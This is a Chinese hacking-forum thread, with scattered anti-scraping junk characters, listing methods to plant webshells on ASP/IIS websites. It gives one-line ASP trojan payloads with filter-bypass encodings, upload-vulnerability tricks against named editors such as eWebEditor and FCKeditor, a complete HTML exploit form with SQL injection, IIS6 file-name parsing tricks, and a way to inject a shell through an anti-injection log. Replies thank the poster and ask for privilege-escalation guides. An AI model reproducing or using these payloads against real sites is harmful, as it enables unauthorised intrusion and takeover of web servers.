返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式2 G1 }) N0 J5 c  [2 T1 a
+ g& w5 f# Z4 w/ K) S
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp% G  l. X/ ]2 S4 _$ m$ C
3 X* w* M2 d% x$ j
3.上传漏洞:
" k$ h( w/ b# x4 d( `/ F2 R! @( n& ^9 X6 `) P
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
1 @' F& T' @) i. b3 g
$ e  e+ |  ^2 O; @3 N! Z8 ~逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件2 w4 [- B* |* u! _  {; F

4 R8 h3 z  w# M6 Q/ ^& I- O2 }/ _雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp7 h1 W) q$ R8 r  k9 Q% n
然后在上传文件里面填要传的图片格式的ASP木马+ j  `% d& |4 R4 Q( Q) {( f  _: g
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp6 j' u$ V: \0 p! u1 O
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
# w9 @4 E* k, ]; M0 L/ P7 f: p
6 b" E6 j) \: F3 z6 ]" A<html>8 E1 Y& y' Y- Q! [& F
<head>( x2 s& F; `9 M4 v2 C' O) p
<title>ewebeditor upload.asp上传利用</title>7 K0 a* L  Q6 d$ W8 u
</head>: [6 Q4 J( `0 C+ _) u1 v
<body>
* A+ P& ?5 c# K. p7 p; Q. J1 ~<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">9 F& y6 E9 R6 Y! j. c# y9 w) `2 i
<input type=file name=uploadfile size=100><br><br>
0 A& O7 `4 @2 D" l. E& s<input type=submit value=Fuck>
# `" s6 U# A- r$ @' S</form>3 n% A  f2 {1 l3 H6 y; M+ }$ L
</body>
  y3 D% J: }8 z' U- W</form>6 Z, h/ O, M$ X
</html>
% |& h- @% ?! }& l/ h! t5 V1 J  ^3 A* s1 F. b
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问. {; s8 A- d6 w* {' U3 {
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp+ U7 C6 ]+ }# E3 U) ]$ x
6 b$ c1 _/ U* l  u. q) S8 h) R
利用windows2003解析。建立zjq.asp的文件夹$ U1 b5 r5 m: ]' L5 I$ n
; v6 N6 m1 D: R8 y6 W3 v1 F
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
2 n. f6 t* w' r% o5 b) P$ G# @
9 t# }9 B* k3 F% b7.cuteeditor:类似ewebeditor# w5 l$ z: A4 k  L

2 x4 D( U( h( a" `  S2 ^8.htmleditor:同上
+ g4 W3 n" ]+ [5 \, T# H% ^+ f# r' U, x0 @1 H
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破) L9 y' K7 \2 w4 s& q# W$ v

# y2 P' z: e% x* _: Z) F<%execute request("value")%><%'<% loop <%:%>/ z& k8 A5 |- j5 \, b( B# l
1 w. _! l$ G/ X6 S# O  x
<%'<% loop <%:%><%execute request("value")%>; u  e1 r5 b* ]$ l

( T6 g, i/ N, `<%execute request("value")'<% loop <%:%>
$ ~1 j2 Z0 @0 L9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
5 g6 N* }9 p3 v' M( M: \: m/ A0 j6 l8 y6 p$ d; e
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
0 b$ B/ ]: I  |' D& m% S& G2 t: \" J. v' Q* |8 |+ ?. |9 r
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
! Q; l* S0 t, ~: g3 ~2 s0 c5 j% u' W- a# i# B" f
解析漏洞得到webshell. m0 W+ q0 c- `: {9 i
0 z2 ^& V- c' m
12.mssql差异备份,日志备份,前提需知道web路径
4 f3 d$ I" @) u1 q3 }; y4 g8 U4 |; M& P
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell( E' [6 ~( Y9 x& G, `

0 }* Z1 [- ]" f( B7 k) J2 P14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell8 |. k* C2 m5 k/ t. _

& V! L' E  _' x9 p! B' p15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
% g5 b) [' @* }1 ~8 A
3 Q! w7 \3 L+ w; @8 m3 Z9 U' L2 H4 i( {以上只是本人的一些拙见,并不完善,以后想到了再继续添加& ]# n( u; T! p4 L7 y0 c5 E/ |
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 0 [. l. s+ H1 L& w$ B9 v
, E2 m2 g) C: h! U" C
% @7 R2 N* b: M( c3 Z
很好啊、基本的入侵方法都包含了: ~( ?+ O# u. `3 ?
4 l9 v& H# a  t+ k7 X8 t
最好来个提权的帖子再。
+ b- ]- K% W! F0 a* n% f: ]( [1 s' a* u7 O2 Z- e
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表